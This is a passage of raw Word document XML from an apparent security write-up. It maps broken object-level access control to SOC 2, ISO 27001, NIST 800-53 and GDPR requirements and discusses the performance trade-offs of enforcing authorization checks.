                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mandates regular penetration testing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>specifcally</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> designed to test application-layer access</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>controls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="42476171" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="313C6B52" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>SOC 2 Type II</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Trust</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Services</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Criteria)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75EDE3C1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>CC6.1 &amp; CC6.3 (Logical Access Controls):</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Requires</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>organizations to implement logical access controls that restrict</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>infrastructure and data access to authorized users based on</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>their job roles, strictly enforcing least privilege.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="190572E6" w14:textId="77777777" w:rsidTr="00B064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720F7B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>ISO/IEC</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>27001:2022</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Global InfoSec)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC8BCF1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Control A.5.15 (Access Control):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mandates that an access</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>control policy must be established, documented, and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>enforced according to business and security requirements.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Control A.8.12 (Data Leakage Prevention):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Restricts</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>unauthorized extraction of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="449EB700" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01159316" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>NIST SP 800-53</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Rev. 5</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(US Federal</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Systems)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B868F1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>AC-2 (Account Management) &amp; AC-3 (Access Enforcement):</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Specifes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the information system must enforce approved</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>authorizations for logical access to information and system</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>resources based on explicit access control policies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="500D1020" w14:textId="77777777" w:rsidTr="00B064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DF4AFD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>GDPR</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(General</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Data Protection</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Regulation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4C8EBE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Article 32 (Security of Processing):</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requires technical</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">measures to ensure ongoing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>confdentiality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> and integrity. Failing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>to implement object-level checks that allow users to view other</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">citizens' PII constitutes a direct, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>fneable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> violation of "Data</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Protection by Design."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20307444" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Operational &amp; Team Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE929F8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The "Fix" Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC040E"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Implementing bulletproof, defense-in-depth access control is non-negotiable for security, but it can introduce real-world operational frictions if not engineered thoughtfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03347BC2"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1. Performance &amp; Latency Bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C7FE5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a strict "Never Trust, Always Verify" architecture, the application must query the access control policy or database on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>every single request</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dashboard page loads 20 nested resources, and each resource requires a separate round-trip database query to check ownership (known as the $N+1$ query problem), system latency will skyrocket. In a microservices mesh, validating permissions across multiple network boundaries adds massive serialization and transport overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643336F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Balance Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Smart Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement fast, in-memory caching (like Redis) for user permissions and roles with brief Time-To-Live (TTL) windows, ensuring database hits are minimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18FF7E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Database Joins:</w:t>
      </w:r>
